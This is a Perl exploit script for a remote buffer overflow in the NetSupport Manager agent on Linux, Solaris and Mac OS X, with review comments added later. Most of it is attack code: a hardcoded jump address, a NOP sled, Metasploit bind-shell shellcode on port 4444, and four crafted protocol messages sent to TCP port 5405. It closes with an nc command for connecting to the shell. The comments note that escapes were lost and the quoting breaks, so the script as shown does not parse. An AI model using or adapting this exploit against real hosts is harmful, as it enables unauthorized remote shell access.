# Title : NetSupport Manager Agent Remote Buffer Overflow
# Published : 2011-01-08
# Author : ikki
#!/usr/bin/perl
#
# NetSupport Manager Agent Remote Buffer Overflow
# Product details: http://www.netsupportmanager.com/
#
# This vulnerability affects the following software:
#
# [Vulnerable]
# NetSupport Manager for Linux v11.00 and likely all previous
# NetSupport Manager for Solaris v9.50 and likely all previous
# NetSupport Manager for Mac OS X v11.00 and likely all previous
#
# [Not Vulnerable]
# Netsupport Manager for Windows v11.00
#
# [Unknown]
# Netsupport Manager for Windows CE v11.00
# Netsupport Manager for Pocket PC v11.00
# NetSupport Manager for DOS v7.01
# Other products based on the same codebase (e.g. NetSupport School)
#
# This exploit has been tested against:
# - NetSupport Manager Linux agent v10.50.0
# - NetSupport Manager Linux agent v11.0.0
#
# As far as I know, this is still unpatched.
#
# Credit: Luca Carettoni (@_ikki)
use strict;
use warnings;
use IO::Socket;
# Argument handling and connection set-up.
# NOTE(review): backslash escapes appear to have been lost in page extraction
# throughout this script ("n" where a newline escape is intended, and likewise
# in the byte strings below); the literals read as plain ASCII as shown.
my $host = shift || die "Usage: $0 host [port]n";   # required: target host name/address
my $port = shift || 5405;                             # optional: agent port, defaults to 5405
# NOTE(review): indirect-object syntax; IO::Socket::INET->new(...) is the
# conventional form.  'PeerProto' is not an IO::Socket::INET option (the key is
# 'Proto'); TCP is used only because it is the module default -- confirm.
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') or die "error: $!n";
print "--[ NetSupport Manager Linux Agent Remote Buffer Overflow ]n";
# NOTE(review): "@_ikki" inside a double-quoted string interpolates an array;
# under `use strict` an undeclared @_ikki is a compile-time error.
print "--[ @_ikki 2010 ]nn";
# Payload construction.
# The overwrite uses an absolute address inside the clientdaemon binary
# (0x0808xxxx range) as a "jmp esp" trampoline.  NOTE(review): that only works
# if the daemon is built without PIE and runs with an executable stack, so a
# PIE/NX-enabled build would break this technique -- inferred from the address
# and the author's comment, not verified against the binary.
#my $ret_address = 0x0808bd4f; #jmp esp /usr/nsm/daemon/clientdaemon v10.50.0
my $ret_address = 0x0808c4bf; #jmp esp /usr/nsm/daemon/clientdaemon v11.0.0
my $pad = 976;                 # filler bytes placed before the return-address overwrite (see $triggerC)
my $nop = "x90" x 50;          # intended as a 50-byte NOP sled (escapes lost in extraction, see above)
# linux/x86/shell_bind_tcp - 217 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# AutoRunScript=, AppendExit=false, PrependChrootBreak=false,
# PrependSetresuid=false, InitialAutoRunScript=,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
# Per the header above: a Metasploit bind shell listening on TCP/4444,
# alpha_mixed-encoded (hence the mostly-printable byte values).
my $shellcode =
"x89xe0xdbxcbxd9x70xf4x59x49x49x49x49x49x49" .
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x46x51x49x4bx4cx37x4ax43x51x43x43" .
"x73x43x63x43x5ax44x42x4cx49x4bx51x48x30x51" .
"x76x4ax6dx4dx50x43x6bx51x4ex50x52x43x58x49" .
"x6fx47x72x47x61x51x4cx43x5ax42x30x42x71x46" .
"x30x4cx49x48x61x51x7ax45x36x46x38x48x4dx4d" .
"x50x4cx49x51x51x46x64x4dx63x46x64x4cx70x45" .
"x36x4ax6dx4bx30x51x53x4cx70x51x76x4ax6dx4b" .
"x30x4ex73x50x59x50x6ax47x4fx46x38x4ax6dx4b" .
"x30x47x39x43x49x49x68x50x68x46x4fx46x4fx42" .
"x53x45x38x51x78x46x4fx45x32x50x69x50x6ex4d" .
"x59x49x73x50x50x42x73x4bx39x49x71x4cx70x44" .
"x4bx48x4dx4dx50x41x41";
# Four protocol messages are sent in order (A, B, C, D).  Each begins with a
# small header (0x15, 0x25, 0x37, 0x06 as the first byte); presumably a message
# type/length field -- the protocol is not documented here, so confirm before
# relying on this for signatures.
my $triggerA = "x15x00x5ax00".("x41" x 1024)."x00x00x00".
"x00x00x00x00x00x00x00x00x00x00";
my $triggerB = "x25x00x51x00x81x41x41x41x41x41x41x00".
"x41x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00";
# Trigger C carries the overflow: $pad filler bytes, the packed return address,
# the NOP sled and the shellcode, bracketed by fixed fields.  The ASCII runs
# decode to "ikki" (69 6b 6b 69) and "WORKGROUP" (57 4f 52 4b 47 52 4f 55 50);
# the trailing "12.62.1.420" / "10" look like version fields -- unverified.
# Detection note: as written, this message holds 976 bytes of 0x41 followed by
# non-printable data, which is far longer than the fixed fields around it.
my $triggerC = "x37x00x03x00x0ax00x00x00x00x00x58xb4".
"x92xffx00x00x69x6bx6bx69x00x57x4fx52".
"x4bx47x52x4fx55x50x00x3cx3e". #pleasure trail
("A"x$pad).pack("V", $ret_address).$nop.$shellcode.
"x00x00x31x32x2ex36x32x2ex31x2ex34x32".
"x30x00x31x30x00x00";
my $triggerD = "x06x00x07x00x20x00x00x00x0ex00x32x00".
"x01x10x18x00x00x01x9fx0dx00x00xe0x07".
"x06x00x07x00x00x00x00x00x02x00x4ex00".
"x02x00xacx00x04x00x7fx00x00x00";
# Delivery: the four messages go out one second apart on the same TCP session,
# then the socket is closed.  No credential or challenge is exchanged in these
# four messages, so the agent appears reachable unauthenticated on this port;
# restricting TCP/5405 to management hosts limits exposure -- inferred from the
# traffic shown, not from protocol documentation.
print "Sending triggers...n";
$sock->send($triggerA);
sleep 1;
$sock->send($triggerB);
sleep 1;
$sock->send($triggerC);
sleep 1;
$sock->send($triggerD);
sleep 1;
$sock->close;
# NOTE(review): the quoting on this line is broken as shown (inner quotes are
# unescaped after extraction), so the script does not parse in this form.
print "A shell is waiting: "nc ".$host." 4444"nn";